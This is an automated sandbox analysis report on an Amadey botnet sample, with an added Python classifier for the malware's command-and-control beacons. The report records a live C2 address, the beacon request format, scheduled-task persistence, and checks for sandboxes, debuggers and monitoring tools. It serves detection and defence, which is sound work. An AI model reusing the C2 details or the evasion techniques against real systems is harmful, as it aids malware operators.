Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1520516
MD5: e3aa1042729bc6d0ddbed39ddb48b872
SHA1: d9642336d578f012359bbd1f49c90798a76d92ac
SHA256: 14165c7b3da199b6b30c325c1906d87578ceebe57cda17a1bd87aae2c1aaf06e
Tags: exe, user-Bitsight

Detection

Amadey
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadey's stealer DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7352 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E3AA1042729BC6D0DDBED39DDB48B872)
    • axplong.exe (PID: 7576 cmdline: "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" MD5: E3AA1042729BC6D0DDBED39DDB48B872)
  • axplong.exe (PID: 8080 cmdline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe MD5: E3AA1042729BC6D0DDBED39DDB48B872)
  • cleanup
Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Extracted malware configuration (Amadey): {"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}
Yara matches in memory dumps:
Source | Rule | Description | Author
00000002.00000003.1403500499.0000000004A60000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
00000006.00000003.1963827399.0000000004910000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
00000000.00000003.1378088248.0000000005200000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
00000000.00000002.1418313558.0000000000011000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
(1 further entry not shown)
Yara matches in unpacked PE files:
Source | Rule | Description | Author
0.2.file.exe.10000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
6.2.axplong.exe.400000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
2.2.axplong.exe.400000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
                  No Sigma rule has matched
Suricata IDS alerts:
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-27T12:55:12.578966+0200 | 2856147 | 1 | A Network Trojan was detected | 192.168.2.9 | 49711 | 185.215.113.16 | 80 | TCP


                  AV Detection

Source: file.exe | Avira: detected
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 00000002.00000003.1403500499.0000000004A60000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | ReversingLabs: Detection: 52%
Source: file.exe | ReversingLabs: Detection: 52%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Joe Sandbox ML: detected
Source: file.exe | Joe Sandbox ML: detected
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

                  Networking

Source: Network traffic | Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.9:49711 -> 185.215.113.16:80
Source: Malware configuration extractor | IPs: 185.215.113.16
Source: global traffic | HTTP traffic detected (2 times): POST /Jo89Ku7d/index.php HTTP/1.1; Content-Type: application/x-www-form-urlencoded; Host: 185.215.113.16; Content-Length: 4; Cache-Control: no-cache; Data Ascii: st=s
Source: global traffic | HTTP traffic detected (10 times): POST /Jo89Ku7d/index.php HTTP/1.1; Content-Type: application/x-www-form-urlencoded; Host: 185.215.113.16; Content-Length: 152; Cache-Control: no-cache; Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C218BAB8081C452E3DC7E7476C9D90FF1F32881F51
Source: global traffic | HTTP traffic detected (6 times): POST /Jo89Ku7d/index.php HTTP/1.1; Content-Type: application/x-www-form-urlencoded; Host: 185.215.113.16; Content-Length: 4; Cache-Control: no-cache; Data Ascii: st=s
Source: Joe Sandbox View | IP Address: 185.215.113.16
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.16 (50 occurrences)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 6_2_0040BD60 InternetOpenW, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetReadFile
Source: unknown | HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1; Content-Type: application/x-www-form-urlencoded; Host: 185.215.113.16; Content-Length: 4; Cache-Control: no-cache; Data Ascii: st=s
Source: axplong.exe, 00000006.00000002.2627219543.0000000000C69000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
Source: axplong.exe, 00000006.00000002.2627219543.0000000000C69000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpD
Source: axplong.exe, 00000006.00000002.2627219543.0000000000C69000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpE
Source: axplong.exe, 00000006.00000002.2627219543.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpM
Source: axplong.exe, 00000006.00000002.2627219543.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpOF_i
Source: axplong.exe, 00000006.00000002.2627219543.0000000000C69000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpQ
Source: axplong.exe, 00000006.00000002.2627219543.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpded
Source: axplong.exe, 00000006.00000002.2627219543.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
Source: axplong.exe, 00000006.00000002.2627219543.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded6
Source: axplong.exe, 00000006.00000002.2627219543.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedn
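
Turning the beacon shape recorded above into a detection, as an added example that is not part of the Joe Sandbox report and not Amadey's code: the parser and classifier below are mine. The two beacon requests are reconstructed from the "HTTP traffic detected" lines above (the report runs the headers together on one line; they are separated with CRLF here), the benign request is constructed for contrast, and the C2 url comes from the extracted configuration. The classifier scores the traits the report itself lists, namely a POST to a bare IP with no preceding DNS query, no User-Agent header, a form-urlencoded body that is either the 4-byte st=s status beacon or an r= parameter carrying hex-encoded data. The r= payload is only length-checked (150 hex characters, 75 bytes): the page does not describe its encoding or encryption, so nothing here tries to decode it.

```python
"""Classify HTTP requests against the Amadey C2 beacon shape seen in this report.

Added example, not Joe Sandbox's or Amadey's code.  BEACON_STATUS and BEACON_REG
are reconstructed from the report's 'HTTP traffic detected' lines; BENIGN is
constructed.  The hex 'r=' payload is only length-checked, because the page does
not describe how it is encoded or encrypted.
"""
import ipaddress
import re

C2_URL = "185.215.113.16/Jo89Ku7d/index.php"   # "C2 url" from the extracted config

BEACON_STATUS = (b"POST /Jo89Ku7d/index.php HTTP/1.1\r\n"
                 b"Content-Type: application/x-www-form-urlencoded\r\n"
                 b"Host: 185.215.113.16\r\n"
                 b"Content-Length: 4\r\n"
                 b"Cache-Control: no-cache\r\n"
                 b"\r\n"
                 b"st=s")
BEACON_REG = (b"POST /Jo89Ku7d/index.php HTTP/1.1\r\n"
              b"Content-Type: application/x-www-form-urlencoded\r\n"
              b"Host: 185.215.113.16\r\n"
              b"Content-Length: 152\r\n"
              b"Cache-Control: no-cache\r\n"
              b"\r\n"
              b"r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F"
              b"81008DA96AE6CEFBA54FC3FAFD33C218BAB8081C452E3DC7E7476C9D90FF1F32881F51")
BENIGN = (b"POST /api/login HTTP/1.1\r\n"            # constructed, for contrast
          b"Host: www.example.com\r\n"
          b"User-Agent: Mozilla/5.0\r\n"
          b"Content-Type: application/x-www-form-urlencoded\r\n"
          b"Content-Length: 7\r\n"
          b"\r\n"
          b"user=ab")


def parse_http_request(raw: bytes) -> dict:
    """Minimal HTTP/1.1 request parser: request line, lower-cased headers, raw body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.decode("latin-1").split("\r\n")
    method, path, version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version,
            "headers": headers, "body": body}


def host_is_literal_ip(host: str) -> bool:
    """True for 'Host: 1.2.3.4[:port]'; such connections need no DNS query first."""
    try:
        ipaddress.ip_address(host.split(":")[0])
        return True
    except ValueError:
        return False


def classify(req: dict, c2_url: str = C2_URL) -> dict:
    """Score one parsed request against the beacon pattern observed in the report."""
    h, body = req["headers"], req["body"]
    reasons, payload_bytes = [], None
    if req["method"] != "POST":
        return {"verdict": False, "reasons": reasons, "payload_bytes": payload_bytes}
    host = h.get("host", "")
    c2_match = host + req["path"] == c2_url
    if c2_match:
        reasons.append("matches the C2 url from the extracted config")
    if host_is_literal_ip(host):
        reasons.append("Host is a literal IP, so no DNS query precedes the connection")
    if "user-agent" not in h:
        reasons.append("POST without a User-Agent header")
    if h.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        reasons.append("form-urlencoded body")
    if body == b"st=s":
        reasons.append("4-byte status beacon st=s")
    m = re.fullmatch(rb"r=([0-9A-F]+)", body)
    if m and len(m.group(1)) % 2 == 0:
        payload_bytes = len(m.group(1)) // 2
        reasons.append("hex-encoded r= payload of %d bytes" % payload_bytes)
    beacon_body = body == b"st=s" or payload_bytes is not None
    # A known C2 url is enough on its own; otherwise require the full behavioural
    # shape (bare-IP host, no User-Agent, Amadey-style body) before calling it a beacon.
    verdict = c2_match or (host_is_literal_ip(host) and "user-agent" not in h and beacon_body)
    return {"verdict": verdict, "reasons": reasons, "payload_bytes": payload_bytes}


if __name__ == "__main__":
    for label, raw in (("status", BEACON_STATUS), ("register", BEACON_REG), ("benign", BENIGN)):
        result = classify(parse_http_request(raw))
        print(label, result["verdict"], "; ".join(result["reasons"]))
```

The split between c2_match and the behavioural shape is deliberate: the IP and path rotate between Amadey builds, so a rule keyed only on this configuration's 185.215.113.16/Jo89Ku7d/index.php goes stale, whereas the shape (bare-IP host, no User-Agent, st=s or r=<hex> body) survives a C2 change and is what the ETPRO Suricata signature above is effectively matching on.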

                  System Summary

Source: file.exe | Static PE information: section name: (not rendered; non-printable characters)
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (not rendered; non-printable characters)
Source: axplong.exe.0.dr | Static PE information: section name: (not rendered; non-printable characters)
Source: axplong.exe.0.dr | Static PE information: section name: .idata
Source: axplong.exe.0.dr | Static PE information: section name: (not rendered; non-printable characters)
Source: C:\Users\user\Desktop\file.exe | File created: C:\Windows\Tasks\axplong.job
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 6_2_0040E440
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 6_2_00443068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 6_2_00404CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 6_2_00437D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 6_2_0044765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 6_2_00404AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 6_2_0044777B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 6_2_00446F09
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 6_2_00448720
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 6_2_00442BD0
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: (non-printable name) ZLIB complexity 0.9972060200953679
Source: file.exe | Static PE information: Section: wpzcbdbk ZLIB complexity 0.9945939571060383
Source: axplong.exe.0.dr | Static PE information: Section: (non-printable name) ZLIB complexity 0.9972060200953679
Source: axplong.exe.0.dr | Static PE information: Section: wpzcbdbk ZLIB complexity 0.9945939571060383
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@4/3@0/1
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\44111dbc49
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | ReversingLabs: Detection: 52%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application (2 occurrences)
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: C:\Users\user\Desktop\file.exe | Sections loaded (in order): apphelp.dll, winmm.dll, wininet.dll, sspicli.dll, kernel.appcore.dll, uxtheme.dll, mstask.dll, windows.storage.dll, wldp.dll, mpr.dll, dui70.dll, duser.dll, chartv.dll, onecoreuapcommonproxystub.dll, oleacc.dll, atlthunk.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll (3 times), wtsapi32.dll, winsta.dll, textshaping.dll, propsys.dll, windows.staterepositoryps.dll, windows.fileexplorer.common.dll, iertutil.dll, profapi.dll, explorerframe.dll, edputil.dll, urlmon.dll, srvcli.dll, netutils.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Section loaded: netutils.dll
                  Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
                  Source: file.exe | Static file information: File size 1942016 > 1048576
                  Source: file.exe | Static PE information: Raw size of wpzcbdbk is bigger than: 0x100000 < 0x1a8600

                  Data Obfuscation

                  Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.10000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wpzcbdbk:EW;remsbmyf:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wpzcbdbk:EW;remsbmyf:EW;.taggant:EW;
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Unpacked PE file: 2.2.axplong.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wpzcbdbk:EW;remsbmyf:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wpzcbdbk:EW;remsbmyf:EW;.taggant:EW;
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Unpacked PE file: 6.2.axplong.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wpzcbdbk:EW;remsbmyf:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wpzcbdbk:EW;remsbmyf:EW;.taggant:EW;
                  Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
                  Source: axplong.exe.0.dr | Static PE information: real checksum: 0x1e466b should be: 0x1dc1a2
                  Source: file.exe | Static PE information: real checksum: 0x1e466b should be: 0x1dc1a2
                  Source: file.exe | Static PE information: section name:
                  Source: file.exe | Static PE information: section name: .idata
                  Source: file.exe | Static PE information: section name:
                  Source: file.exe | Static PE information: section name: wpzcbdbk
                  Source: file.exe | Static PE information: section name: remsbmyf
                  Source: file.exe | Static PE information: section name: .taggant
                  Source: axplong.exe.0.dr | Static PE information: section name:
                  Source: axplong.exe.0.dr | Static PE information: section name: .idata
                  Source: axplong.exe.0.dr | Static PE information: section name:
                  Source: axplong.exe.0.dr | Static PE information: section name: wpzcbdbk
                  Source: axplong.exe.0.dr | Static PE information: section name: remsbmyf
                  Source: axplong.exe.0.dr | Static PE information: section name: .taggant
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 6_2_0041D84C push ecx; ret 6_2_0041D85F
                  Source: file.exe | Static PE information: section name: entropy: 7.979919668265035
                  Source: file.exe | Static PE information: section name: wpzcbdbk entropy: 7.953456823391056
                  Source: axplong.exe.0.dr | Static PE information: section name: entropy: 7.979919668265035
                  Source: axplong.exe.0.dr | Static PE information: section name: wpzcbdbk entropy: 7.953456823391056
                  Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

                  Boot Survival

                  Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
                  Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                  Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Window searched: window name: FilemonClass
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Window searched: window name: RegmonClass
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Window searched: window name: Regmonclass
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Window searched: window name: Filemonclass
                  Source: C:\Users\user\Desktop\file.exe | File created: C:\Windows\Tasks\axplong.job
                  Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                  Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 240E22 second address: 240E26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 240E26 second address: 240E3E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65604h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 240E3E second address: 240E48 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F84B0B050DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 241852 second address: 24186B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ecx 0x00000006 jnp 00007F84B0D655F6h 0x0000000c pop ecx 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007F84B0D655FCh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24186B second address: 24186F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24186F second address: 241879 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F84B0D655F6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 241879 second address: 2418DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F84B0B050D8h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ebp 0x00000028 call 00007F84B0B050D8h 0x0000002d pop ebp 0x0000002e mov dword ptr [esp+04h], ebp 0x00000032 add dword ptr [esp+04h], 00000018h 0x0000003a inc ebp 0x0000003b push ebp 0x0000003c ret 0x0000003d pop ebp 0x0000003e ret 0x0000003f mov dword ptr [ebp+122D27D7h], ebx 0x00000045 or dword ptr [ebp+122D2909h], esi 0x0000004b push 00000000h 0x0000004d mov dword ptr [ebp+122D27D2h], esi 0x00000053 xchg eax, ebx 0x00000054 jbe 00007F84B0B050DEh 0x0000005a push edi 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 242149 second address: 24214D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2457F8 second address: 2457FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24595B second address: 245973 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F84B0D655FEh 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2478CE second address: 2478DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2478DC second address: 247950 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D655FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007F84B0D6560Fh 0x0000000f popad 0x00000010 nop 0x00000011 movsx edi, ax 0x00000014 push 00000000h 0x00000016 jmp 00007F84B0D65601h 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push eax 0x00000020 call 00007F84B0D655F8h 0x00000025 pop eax 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a add dword ptr [esp+04h], 0000001Ah 0x00000032 inc eax 0x00000033 push eax 0x00000034 ret 0x00000035 pop eax 0x00000036 ret 0x00000037 xchg eax, esi 0x00000038 push eax 0x00000039 push edx 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d pop edx 0x0000003e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2498B1 second address: 2498BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 ja 00007F84B0B050D6h 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2498BD second address: 2498C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 247AB9 second address: 247ABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F2A57 second address: 1F2A68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 jg 00007F84B0D655F6h 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop ebx 0x00000011 rdtsc
